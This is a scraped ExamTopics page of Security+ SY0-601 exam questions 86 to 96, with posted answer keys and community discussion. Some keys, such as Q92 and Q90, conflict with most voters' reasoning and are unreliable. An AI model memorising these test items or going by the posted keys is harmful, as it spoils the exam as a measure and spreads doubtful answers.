  Sir_Learnalot Most Recent  2 months, 3 weeks ago


Selected Answer: B
MDM will do the job
upvoted 1 times

  grinop 3 months, 2 weeks ago


I agree that MDM is corrrect. Te question almost tricked me into selecting geofencing however MDM is best suited since geofencing would only
accomplish limiting loaction.
upvoted 2 times

  scarceanimal 15 hours, 1 minute ago


yes, after all they can still use it for personal use within geofencing perimeters. mdm will prevent that
upvoted 1 times

  Bob455 4 months, 1 week ago


A. a MDM would be used if the org was concerned about the users using thr devices for other purposes but the questioons states they are not
and it gives a geohraphical clue with "users work in one city"
upvoted 1 times

  redsidemanc2 4 months, 4 weeks ago


MDM is best solution.
MDM provides the other 3 in one solution
upvoted 1 times

  comeragh 5 months ago


Selected Answer: B
Agree with B - MDM as being correct answer here
upvoted 2 times

  Boogie_79 5 months ago


Selected Answer: B
agreed
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 155/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #86 Topic 1

Which of the following control types is focused primarily on reducing risk before an incident occurs?

A. Preventive

B. Deterrent

C. Corrective

D. Detective

Correct Answer: A

Community vote distribution


A (85%) B (15%)

  cozzmo Highly Voted  4 months, 3 weeks ago


Selected Answer: A
Yay.. finally one that makes sense!
upvoted 8 times

  carpathia Highly Voted  4 months, 3 weeks ago


Selected Answer: A
"Preventive controls act before an event, preventing it from advancing". Deterrent - "acts to discourage the attacker by reducing the likelhood of
success from the perspective of the attacker".
upvoted 6 times

  ScottT 4 months, 3 weeks ago


https://www.sciencedirect.com/topics/computer-science/preventative-control
upvoted 1 times

  DALLASCOWBOYS Most Recent  5 days, 20 hours ago


A. Preventive controls stop a security issue before it occurs.
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: A
Preventive—the control acts to eliminate or reduce the likelihood that an attack can
succeed. A preventative control operates BEFORE an attack can take place.
upvoted 1 times

  FMMIR 2 months, 1 week ago


Selected Answer: A
preventive controls are controls intended to completely avoid an incident from being able to occur. Deterrent controls, alternatively, are intended
to discourage a bad actor from an unlawful activity that they had originally intended to perform.
upvoted 1 times

  okay123 2 months, 3 weeks ago


Selected Answer: A
Deterrent controls reduce the likelihood of a deliberate attack. Preventative controls protect vulnerabilities and make an attack unsuccessful or
reduce its impact.

https://www.sciencedirect.com/topics/computer-science/deterrent-
control#:~:text=Deterrent%20controls%20reduce%20the%20likelihood%20of%20a%20deliberate%20attack.&text=Preventative%20controls%
20protect%20vulnerabilities%20and,unsuccessful%20or%20reduce%20its%20impact.

So A ("reducing risk")
upvoted 1 times

  Halaa 4 months, 3 weeks ago


Selected Answer: B
reducing risk before it happens--deterrent
upvoted 3 times

  Jakalan7 4 months, 2 weeks ago


I can see where you are coming from, but they are asking what reduces risk - so the answer has to be A. Deterrents are " intended to
discourage someone from doing something", they don't actually prevent a risk though. For example, a fence is a deterrent, but people can still
get a ladder and climb over it, it does not reduce the risk.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 156/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  zf1343 1 week ago


Question says it's "focused primarily on reducing". Preventive controls primarily function as preventive control not reducing.
upvoted 1 times

  Libraboy 3 months, 2 weeks ago


A fence reduces the number of people that will be hoping to break in. in this case, a preventive measure would be an electric fence.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 157/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #87 Topic 1

A systems administrator reports degraded performance on a virtual server. The administrator increases the virtual memory allocation, which
improves conditions, but performance degrades again after a few days. The administrator runs an analysis tool and sees the following output:
==3214== timeAttend.exe analyzed
==3214== ERROR SUMMARY:
==3214== malloc/free: in use at exit: 4608 bytes in 18 blocks.
==3214== checked 82116 bytes
==3214== definitely lost: 4608 bytes in 18 blocks.
The administrator terminates the timeAttend.exe, observes system performance over the next few days, and notices that the system performance
does not degrade. Which of the following issues is MOST likely occurring?

A. DLL injection

B. API attack

C. Buffer overflow

D. Memory leak

Correct Answer: D

Community vote distribution


D (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: D
Definitely memory leak ' key sentence' -> The administrator increases the virtual memory allocation, which improves conditions, but performance
degrades again after a few days.
Memory leak occurs when programmers create a memory in heap and forget to delete it.

The consequences of memory leak is that it reduces the performance of the computer by reducing the amount of available memory. Eventually, in
the worst case, too much of the available memory may become allocated and all or part of the system or device stops working correctly, the
application fails, or the system slows down vastly .
upvoted 58 times

  Gino_Slim 3 months, 2 weeks ago


Stoneface will help you pass this everyone (lol)
upvoted 15 times

  ronniehaang Most Recent  4 days, 16 hours ago


Selected Answer: D
The issue that is most likely occurring is a memory leak. A memory leak occurs when a program allocates memory dynamically, but does not free
it properly. Over time, this results in a gradual increase in memory usage, leading to degraded system performance and eventually to a crash. The
output from the analysis tool shows that timeAttend.exe is the cause of the memory leak, as it has 4608 bytes in 18 blocks of memory that are
definitely lost. Terminating the timeAttend.exe process and observing improved system performance confirms this diagnosis.
upvoted 1 times

  jjhidalgo21 2 months ago


WHO IS STONEFACE?
upvoted 2 times

  MusaKeita 3 months, 2 weeks ago


memory leak
upvoted 1 times

  MarciaL 3 months, 2 weeks ago


I think B. API attack
upvoted 1 times

  Wanafresh 4 months ago


Memory leaks are usually caused by failure to deallocate memory that has been allocated.
upvoted 2 times

  cozzmo 4 months, 3 weeks ago


Thank you Stoneface!
upvoted 2 times

  comeragh 5 months ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 158/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Well spotted stoneface. Agree with you on D for this one.


upvoted 2 times

Question #88 Topic 1

An administrator is experiencing issues when trying to upload a support file to a vendor. A pop-up message reveals that a payment card number
was found in the file, and the file upload was blocked. Which of the following controls is most likely causing this issue and should be checked
FIRST?

A. DLP

B. Firewall rule

C. Content filter

D. MDM

E. Application allow list

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
DLP - Data Loss Prevention uses exact data matching or regex matching - in this case a regex rule for detecting credit card numbers could be in
place that is actively blocking the upload of the document -

Regex for detecting and Amex Card: ^3[47][0-9]{13}$

Source https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests
upvoted 23 times

  KingDrew Most Recent  3 weeks, 1 day ago


Selected Answer: A
DLP keeps sensitive data such as PHI, PII, and PCI-DSS secure from escaping the network or being leaked.
upvoted 2 times

  learnNcurve 2 months, 1 week ago


Selected Answer: A
A data loss prevention (DLP) device can reduce the risk of employees emailing confidential information outside the organization
upvoted 1 times

  comeragh 5 months ago


Selected Answer: A
Agree with DLP being the correct answer here
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 159/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #89 Topic 1

Which of the following risk management strategies would an organization use to maintain a legacy system with known risks for operational
purposes?

A. Acceptance

B. Transference

C. Avoidance

D. Mitigation

Correct Answer: A

Community vote distribution


A (76%) D (24%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
Accepting risk, or risk acceptance, occurs when a business or individual acknowledges that the potential loss from a risk is not great enough to
warrant spending money to avoid it.
upvoted 22 times

  Gino_Slim 3 months, 2 weeks ago


In stoneface we trust
upvoted 7 times

  scarceanimal Most Recent  14 hours, 37 minutes ago


Selected Answer: D
question asks what they'd use to *maintain*. They're accepting residual risk with the fact that they're using a legacy system, but they intend to
actually use it and maintain it for operational purposes. Mitigation and acceptance of the residual risk is the right call here.
upvoted 1 times

  DALLASCOWBOYS 5 days, 20 hours ago


A. Acceptance. The organization has chosen to accept the risk because the risk is known.
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: A
Risk acceptance (or tolerance) means that no countermeasures are put in place either
because the level of risk does not justify the cost or because there will be unavoidable
delay before the countermeasures are deployed. In this case, you should continue to
monitor the risk (as opposed to ignoring it).
upvoted 1 times

  Boubou480 4 weeks, 1 day ago


Selected Answer: D
Answer is D) Mitigation
When risk is accepted, there is no further action.
When risk is identified and must be treated, the next course of action is Mitigation.
upvoted 1 times

  alwaysrollin247 1 month, 2 weeks ago


Selected Answer: A
The key word in the question is "Legacy". Legacy equipment is no longer supported by the vendor, which means no new patches will ever be
released for this equipment again, there is no mitigation here. If a company is using legacy equipment with known risks, they have accepted
those risks.
upvoted 2 times

  okay123 1 month, 3 weeks ago


Selected Answer: D
The risks need to be mitigated, not just accepted.
upvoted 2 times

  GMuney 2 months, 2 weeks ago


Selected Answer: D
I agree with Mitigation since the company wants to "maintain" the legacy system. I interpret that as doing what they can to use that system rather
than just accept the risks and do nothing about it. There isn't enough information in the question to determine whether these risks can be
mitigated or not though.
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 160/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  bengy78 2 months, 2 weeks ago
Selected Answer: D
Its risk mitigation per Compti Certmaster "Patch management can also be difficult for legacy systems, proprietary systems, and systems from
vendors without robust security management plans, such as some types of Internet of Things devices. These systems will need compensating
controls, or some other form of risk mitigation if patches are not readily available."
upvoted 1 times

  G4ct756 3 months, 2 weeks ago


Selected Answer: D
Why not Mitigation, and accept the residual risk? Seems more practical than acceptance.
upvoted 2 times

  Sandon 2 weeks ago


In the end you still have to accept the risk of maintaining a legacy system.
upvoted 1 times

  Oval61251 3 months, 1 week ago


My thoughts too
upvoted 1 times

  Fastytop 3 months, 3 weeks ago


Transference risk control strategy occurs when an organization decides to deflect a risk it encounters to another organization. you must think
about this option.B
upvoted 2 times

  Gino_Slim 3 months, 2 weeks ago


That has nothing to do with what was asked my boy
upvoted 3 times

  comeragh 5 months ago


Selected Answer: A
Agree with A being the correct answer here
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 161/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #90 Topic 1

Which of the following is the BEST action to foster a consistent and auditable incident response process?

A. Incent new hires to constantly update the document with external knowledge.

B. Publish the document in a central repository that is easily accessible to the organization.

C. Restrict eligibility to comment on the process to subject matter experts of each IT silo.

D. Rotate CIRT members to foster a shared responsibility model in the organization.

Correct Answer: D

Community vote distribution


B (61%) D (39%)

  G4ct756 Highly Voted  3 months, 2 weeks ago


Selected Answer: B
I think is B, because there are 2 requirements " Consistent & Auditable".
D, will foster consistent IR process, but not auditable.
B, will ensure consistency in understanding in IR process & document is auditable.
upvoted 10 times

  sterfryy Highly Voted  1 month, 3 weeks ago


The best action to foster a consistent and auditable incident response process is to publish the document in a central repository that is easily
accessible to the organization. This will ensure that all members of the organization have access to the latest version of the document and can
refer to it easily in the event of an incident. It will also enable the organization to track changes to the document over time, helping to ensure that
the incident response process remains up to date and effective.
upvoted 6 times

  sarah2023 Most Recent  1 day, 15 hours ago


Selected Answer: D
It´s clearly stated in the materials provided that the answer is D
upvoted 1 times

  TinyTrexArmz 12 hours, 36 minutes ago


Maybe quote the materials you're looking at and/or provide a reference.
upvoted 1 times

  DALLASCOWBOYS 5 days, 20 hours ago


B. The only way to foster a consistent response is to publish the SOP where everyone can view the procedures. Now that doesn't mean that
everyone will follow the procedures competently. It is the BEST answer of the choices given.
upvoted 1 times

  Sandon 2 weeks ago


ChatGPT says it's B
upvoted 2 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: B
knowledge base or documentation for a consistent and auditable incident response process.
upvoted 2 times

  RvR109 2 weeks, 3 days ago


Selected Answer: B
According to ChatGPT:

B. Publish the document in a central repository that is easily accessible to the organization.

Making the incident response process document easily accessible to the entire organization is the best way to foster a consistent and auditable
incident response process. This ensures that everyone in the organization is aware of the process and is able to refer to it when needed. It also
allows for easy updates and revisions to be made as needed, and for the document to be readily available for audits.

Option A is not the best option as it could lead to a lack of consistency and understanding of the incident response process among new hires.
Option C is not the best option as it could lead to siloed knowledge and inefficiency in incident response.
Option D is not the best option as it does not ensure that everyone in the organization is aware of the incident response process and could lead
to lack of consistency."
upvoted 2 times

  asum 2 weeks, 3 days ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 162/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: D
Incident response will typically require
24/7 availability, which will be expensive to provide. It is also worth considering that
members of the CIRT should be rotated periodically to preclude the possibility of
infiltration
upvoted 1 times

  scarceanimal 14 hours, 32 minutes ago


inconsistent and not auditable since only those members will be knowledgeable of the process
upvoted 1 times

  KingDrew 3 weeks, 1 day ago


Selected Answer: B
Answer is B, because despite users there will always be that same documentation to follow.
upvoted 2 times

  LaoX 1 month ago


Selected Answer: B
I am voting B because we need to address the "consistent and auditable" process. At the Point of writing this, Options B and D have 50% votes.
Wow!
upvoted 3 times

  deeden 2 months ago


Selected Answer: B
Not sure if shared responsibility promotes consistency. In reality, It feels more like each member will have varying sense of responsibility, and
sharing them does not help with auditing in terms of individual accountability. Shared responsibility make sense in Cloud Services, although there
is still a clear line drawn between the Provider and the Customer responsibility.

On the other hand, well documented policies and procedure ensure everyone follow the same step-by-step action repeatedly without fail, and
can be easily be audited (authoritatively) as required.
upvoted 3 times

  Blueteam 2 months, 2 weeks ago


Correct answer is B.
Centralized repository provide consistent and auditable response.
upvoted 3 times

  bengy78 2 months, 2 weeks ago


Selected Answer: D
Its D. You dont want to publish information outside of the CIRT group per Comptia Certmaster "You must prevent the inadvertent release of
information beyond the team authorized to handle the incident. Status and event details should be circulated on a need-to-know basis and only
to trusted parties identified on a call list."
upvoted 3 times

  Renfri 1 month, 4 weeks ago


You are thinking about the details of the incident, not the incident response procedures.
upvoted 3 times

  Jossie_C 3 months ago


D so all the response team knows how to respond.
upvoted 1 times

  comeragh 4 months, 1 week ago


Selected Answer: D
I would agree with D being the correct answer here.
upvoted 4 times

  redsidemanc2 4 months, 4 weeks ago


Selected Answer: D
Noticed no comments
upvoted 5 times

  redsidemanc2 4 months, 4 weeks ago


NIST SP 800-137 under Computer Incident Response Team (CIRT)
D is correct and only one that makes sense really
upvoted 11 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 163/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #91 Topic 1

During a recent penetration test, the tester discovers large amounts of data were exfiltrated over the course of 12 months via the internet. The
penetration tester stops the test to inform the client of the findings. Which of the following should be the client's NEXT step to mitigate the issue?

A. Conduct a full vulnerability scan to identify possible vulnerabilities.

B. Perform containment on the critical servers and resources.

C. Review the firewall and identify the source of the active connection.

D. Disconnect the entire infrastructure from the internet.

Correct Answer: B

Community vote distribution


B (89%) 7%

  stoneface Highly Voted  5 months ago


Selected Answer: B
Perform containment on the critical servers and resources -> Isolation or containment is the first thing to do after an incident has been
discovered
upvoted 20 times

  tek7ila Most Recent  2 months ago


Selected Answer: B
If we follow Incident Response Process:
1) Preparation - hardening
2) Identification - detection
3) Containment :)
4) Eradication
5) Recovery
6) Lesson Learned

So it has to be CONTAINMENT :)
upvoted 4 times

  tek7ila 2 months ago


If we follow Incident Response Process:
1) Preparation - hardening
2) Identification - detection
3) Containment :)
4) Eradication
5) Recovery
6) Lesson Learned

So it has to be CONTAINMENT :)
upvoted 2 times

  Sarooor 2 months, 2 weeks ago


Selected Answer: B
Perform containment on the critical servers and resources -> Isolation or containment is the first
thing to do after an incident has been discovered.
upvoted 1 times

  Tjank 4 months, 1 week ago


Selected Answer: C
following the Incident Response process:
Preparation, Identification (detection), Containment, Eradication, Recovery, Post-Incident.
Pen Tester would be the Preparation phase ( constantly new vulnerabilities)
Identification is needed to know which systems are affected and the extend of the containment needed.
Containment is next. you use what you have identified to know if you need to segment, isolate, or even shutdown completely.
upvoted 2 times

  Tafari 4 months, 1 week ago


Selected Answer: A
He stopped so he needs to finish so all vulnerable systems are contained
upvoted 1 times

  i_bird 4 months, 1 week ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 164/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

read the question well..


it's the client that is the subject of the question, not the pen tester, and its asking for MITIGATION steps
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 165/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #92 Topic 1

A security analyst is designing the appropriate controls to limit unauthorized access to a physical site. The analyst has a directive to utilize the
lowest possible budget. Which of the following would BEST meet the requirements?

A. Preventive controls

B. Compensating controls

C. Deterrent controls

D. Detective controls

Correct Answer: D

Community vote distribution


C (98%)

  stoneface Highly Voted  5 months ago


Selected Answer: C
This is a confusing one - > Without thinking too much, deterrent controls seems to be less expensive

I hear you ....


upvoted 27 times

  kingsAffection 5 months ago


indeed a confusing one. but I agree deterrence will only use minimum controls to deter action.
upvoted 2 times

  banditring Highly Voted  4 months ago


Selected Answer: C
a piece of paper with a crayon that says 'STAY OUT OF HERE" is the cheapest method if you ask me
upvoted 21 times

  DALLASCOWBOYS 5 days, 20 hours ago


LOL good one.
upvoted 1 times

  sandra001 1 week, 5 days ago


as funny as this sounds, yea it is the cheapest
upvoted 2 times

  Gino_Slim 3 months, 2 weeks ago


This is the answer. Well for me at least. I wouldn't suggest you do this on the exam.
upvoted 3 times

  DALLASCOWBOYS 5 days, 20 hours ago


Most Recent 
C. Deterrent controls would be the least expensive option. Examples would include signage, not monitored CCTV cameras. It does not prevent,
but it may deter an attacker from taking action.
upvoted 2 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: C
deterrent control A type of security
control that discourages intrusion
attempts.
upvoted 1 times

  NovaWarrior 1 month, 2 weeks ago


Selected Answer: C
To meet the requirement of utilizing the lowest possible budget, the security analyst should consider using deterrent controls.

Deterrent controls are security measures that are designed to discourage potential attackers from attempting to gain unauthorized access to a
site. These controls typically involve visible measures such as signage, fencing, and security guards, and are intended to make it clear to
potential attackers that unauthorized access will not be tolerated. Deterrent controls are often less expensive than other types of controls, such
as preventive or detective controls, and can be an effective way to limit unauthorized access without breaking the budget.
upvoted 2 times

  Korokokokokoko 2 months, 2 weeks ago


Selected Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 166/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

According to CompTIA handbooks


Deterrent—the control may not physically or logically prevent access, but psychologically discourages an attacker from attempting an intrusion.
This could include signs and warnings of legal penalties against trespass or intrusion. So this is the loweset possible budget. Also the question
specify to limit unauthorized access, not prevent it entirely.

Using Preventive controls will eliminate or reduce unauthorized access but not the lowest on these categories while detective controls doesn't
deter or prevent access but will identify and record any attempt or successful intrusion.
upvoted 2 times
  Tomtom11 3 months, 3 weeks ago
Selected Answer: D
A detective control is one that facilitates the detection of a physical security
breach. Detective controls act during an event, alerting operators to specific
conditions. Alarms are common examples of detective controls. An IDS is
an example of an IT security alarm that detects intrusions.
upvoted 1 times

  Sklark 3 months, 1 week ago


Detective controls don't prevent acc4ess to a physical site. There's not information on operators being present 24/7 and not every facility has
that. I'd be careful about reading into the question to make such assumptions on the circumstance.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Does not sound cost-effective. I would go with preventive as secondary before detective.
upvoted 1 times

  comeragh 4 months, 1 week ago


Selected Answer: C
I would go with C here also. Example: video surveillance which would be cheaper option.
upvoted 2 times

  tony9622 4 months, 1 week ago


Selected Answer: C
Option C makes sense the more I think about it. A sign that says "restricted area- Authorized personnel only" is a deterrent and could be a few
dollars to make. Correct me If I am wrong but that would be my personal choice If I was deploying deterrent controls.
upvoted 3 times

  Gravoc 4 months, 2 weeks ago


Deterrent makes sense on further thought. The question just states unauthorized access. It doesn't state the intent of any unauthorized intruders.
Deterrence is designed to reduce the occurrence of unintentional bystanders or unmotivated malicious agents from entering the site. Should the
agent be motivated enough, a preventative measure is needed. But again, the question doesn't list intentions. Therefore this method works to
limit the number of unauthorized visitors by weeding out everyone but the motivated, and the truly stupid.
upvoted 1 times

  Fitzd 4 months, 3 weeks ago


CCTV is a Detective control I guess that is why
upvoted 1 times

  _bishalk__ 4 months, 1 week ago


Nah...CCTV also acts as a Deterrent control.
upvoted 1 times

  cozzmo 4 months, 3 weeks ago


Selected Answer: C
Detective will tell you about the crime that has been commited and what is missing.
correct would be Deterrent.
upvoted 1 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: C
Deterrent Controls will be the most budget friendly one.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 167/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #93 Topic 1

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has 100 databases that are on
premises. Which of the following solutions will require the LEAST management and support from the company?

A. SaaS

B. IaaS

C. PaaS

D. SDN

Correct Answer: A

Community vote distribution


A (64%) C (34%)

  Hewn Highly Voted  5 months ago


Selected Answer: A
I think this is one of those questions where real-life experience doesn't answer the question correctly here. The question seems to be focusing
more on which form of cloud computing requires the LEAST amount of management (SaaS) with the database part of the question being filler.
upvoted 27 times

  [Removed] 5 months ago


Honestly I think you're right. PaaS requires management and resource allocation, and SaaS (database software for instance) wouldn't require
nearly as much.
upvoted 3 times

  db97 4 months, 1 week ago


I agree, real-life experience says "PaaS" but theory says "SaaS" lol
upvoted 2 times

  YusufMadkour Highly Voted  5 months, 1 week ago


Selected Answer: C
If they have 100 databases they need to migrate, then they will need a Platform. I don't see how the SaaS model can help with migrating
databases to the cloud.
upvoted 17 times

  scarceanimal 14 hours, 22 minutes ago


they need to migrate the servers. the database part is there to deter you. The question also calls for the least management which Saas
answers for.
upvoted 1 times

  stoneface 5 months, 1 week ago


I concur with this - an example of a Database service offered as a PaaS model is Azure SQL Database, is a fully managed platform as a
service (PaaS. PaaS capabilities built into Azure SQL Database enable you to focus on the domain-specific database administration and
optimization activities that are critical for your business.

https://docs.microsoft.com/en-us/azure/azure-sql/database/sql-database-paas-overview?view=azuresql
upvoted 9 times

  mhmtn Most Recent  1 day, 4 hours ago


Selected Answer: A
SaaS (sometimes called cloud application services) is cloud-hosted, ready-to-use application software. Users pay a monthly or annual fee to use
a complete application from within a web browser, desktop client or mobile app. The application and all of the infrastructure required to deliver it
- servers, storage, networking, middleware, application software, data storage - are hosted and managed by the SaaS vendor.
upvoted 1 times

  DALLASCOWBOYS 5 days, 20 hours ago


C. Platform as a service. The CSP provider builds and manages the infrastructure, and offers customers an execution environment. PaaS
includes multiple infrastructure components including servers, networking equipment, operating systems, storage services, middleware and
databases.
upvoted 1 times

  applepieboy 1 week, 1 day ago


Selected Answer: A
SaaS is the format that requires the least management.
upvoted 2 times

  Boubou480 4 weeks, 1 day ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 168/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: A
SaaS of course
upvoted 2 times

  mike47 1 month, 2 weeks ago


Selected Answer: A
Both SaaS and PaaS management databases in the cloud. However SaaS is the easiest to maintain and manage. You can look this up on the
internet. google: SaaS vs PaaS
A. SaaS would be the correct answer.
upvoted 3 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: A
There are fully managed databases on cloud like AWS RDS
upvoted 2 times

  Alizadeh 1 month, 2 weeks ago


Selected Answer: A
Of the options provided, Software as a Service (SaaS) would typically require the least management and support from the company.

SaaS is a type of cloud computing service that delivers software applications over the internet. With SaaS, the provider typically handles all
aspects of managing and maintaining the software and infrastructure, including updates, security, and scaling. This means that the company
using the SaaS service does not have to worry about managing and supporting the technology themselves.
upvoted 1 times

  rhocale 1 month, 3 weeks ago


its Saas bc they dont want to manage it and Saas is used with a 3rd party
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The solution that will require the LEAST management and support from the company is Software as a Service (SaaS). SaaS is a cloud computing
model in which a third-party provider delivers applications to customers over the internet. With SaaS, the provider is responsible for managing
and maintaining the servers, databases, and infrastructure, so the company doesn't have to. The other options, Infrastructure as a Service (IaaS),
Platform as a Service (PaaS), and Software-Defined Networking (SDN), all require more management and support from the company.
upvoted 2 times

  HL2020 1 month, 4 weeks ago


Selected Answer: A
The question isn't about moving the databases, it happens to say that they have 100 DBs. The question says that they are looking to migrate
SOME servers and asks which solution would require the least MGMT. It doesn't specify how many servers or what kind of servers are migrating.
With the limited knowledge of what they are doing SaaS is the answer.
upvoted 2 times

  deeden 2 months ago


Selected Answer: A
Yeah SaaS make sense if company doesn't want to pay for their own DB Admins. According to this link, DBaaS can be either SaaS or PaaS
depending the solution you want to chose.
https://rockset.com/blog/what-is-a-cloud-database-iaas-paas-saas-dbaas-explained/
upvoted 2 times

  tek7ila 2 months ago


Selected Answer: A
I also would go with SaaS.
upvoted 2 times

  carpathia 2 months, 2 weeks ago


Selected Answer: C
So, my understanding is that the databases are on premises and are not to be noved, only some servers that connect to them or probablythey
mean some of those db servers. That looks like PaaS either way.
upvoted 2 times

  M3ridi3n 2 months, 3 weeks ago


Selected Answer: A
Saas if you want LEAST management and support
upvoted 2 times

  AC1984 2 months, 3 weeks ago


Selected Answer: C
PaaS is the answer. In aws RDS, azure SQL, in gcp Cloud SQL - are all managed database (PaaS). Migrating to managed database service is
something that requires lease amount of management.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 169/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #94 Topic 1

Which of the following employee roles is responsible for protecting an organization's collected personal information?

A. CTO

B. DPO

C. CEO

D. DBA

Correct Answer: B

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: B
A data protection officer (DPO) is an enterprise security leadership role required by the General Data Protection Regulation (GDPR). Data
protection officers are responsible for overseeing a company's data protection strategy and its implementation to ensure compliance with GDPR
requirements
upvoted 10 times

  Boubou480 Most Recent  4 weeks, 1 day ago


Selected Answer: B
DPO is the right role
upvoted 1 times

  Sklark 3 months, 1 week ago


Selected Answer: B
You know if they would list the name of the acronym this would be an incredibly easy exam, but knowing the acronym is the answer here: Data
Protection Officer (DPO).
upvoted 2 times

  Boogie_79 5 months ago


Selected Answer: B
The answer is literally in the question DATA is the keyword!
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 170/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #95 Topic 1

Against the recommendation of the IT security analyst, a company set all user passwords on a server as `P@55w0rD`. Upon review of the
/etc/passwd file, an attacker found the following: alice:a8df3b6c4fd75f0617431fd248f35191df8d237f
bob:2d250c5b2976b03d757f324ebd59340df96aa05e chris:ea981ec3285421d014108089f3f3f997ce0f4150
Which of the following BEST explains why the encrypted passwords do not match?

A. Perfect forward secrecy

B. Key stretching

C. Salting

D. Hashing

Correct Answer: C

Community vote distribution


C (100%)

  Boogie_79 Highly Voted  5 months ago


Selected Answer: C
Salting refers to adding random data to the input of a hash function to guarantee a unique output. The set password, in this case, is already
hashed so to further secure it salting is the next step in cryptography i.e. adding more security to the password. Think of it as "salt bae" making it
just that much better.
upvoted 19 times

  DALLASCOWBOYS Most Recent  5 days, 20 hours ago


C. Salting. Salts eliminate the possibility that duplicate hashes are stored for different user accounts that have the same password.
upvoted 1 times

  xxxdolorxxx 2 weeks, 1 day ago


Selected Answer: C
C all day long
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


salt A security countermeasure that
mitigates the impact of a rainbow table
attack by adding a random value to
("salting") each plaintext input
upvoted 1 times

  Sklark 3 months, 1 week ago


Selected Answer: C
Haha I get that the question says "Against IT recommendations" but can you imagine a company actually setting everyone's passwords to the
same password? There would be no least privilege or admin credentials. Haha anyways the example is testing to see why hash values of the
same password would be different and that would be done by adding salt which is an arbitrary or mathematical extra something to the password
to give it a different value when hashed.
upvoted 3 times

  Libraboy 3 months, 2 weeks ago


Selected Answer: C
different passwords have different hashes but in this case, the same password is used and the only way to achieve different outcomes is by
salting...adding random data to the password (same or not) when hashing to change the stored hash value.
upvoted 1 times

  [Removed] 5 months ago


I'm no expert, but I believe the hashed passwords are actually stored in etc/shadow. Anyways, it's salting.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 171/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #96 Topic 1

After gaining access to a dual-homed (i.e., wired and wireless) multifunction device by exploiting a vulnerability in the device's firmware, a
penetration tester then gains shell access on another networked asset. This technique is an example of:

A. privilege escalation.

B. footprinting.

C. persistence.

D. pivoting.

Correct Answer: D

Community vote distribution


D (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: D
Pivoting -> The act of an attacker moving from one compromised system to one or more other systems on the network
upvoted 24 times

  xxxdolorxxx Most Recent  2 weeks, 1 day ago


Selected Answer: D
Pivoting is correct.
upvoted 2 times

  Idkanything 2 months, 1 week ago


Why not privilege escalation?
upvoted 1 times

  applepieboy 1 week, 1 day ago


Nothing in the question implies the level of access the attacker has. They do however pivot to another device.
upvoted 2 times

  xxxdolorxxx 1 week, 5 days ago


Priv Esc is more on the same machine. Going from a user to root.
upvoted 2 times

  Jossie_C 3 months ago


Selected Answer: D
Lateral movement AKA pivoting
upvoted 2 times

  EDSAL 4 months, 3 weeks ago


answer is D Pivoting
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 172/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #97 Topic 1

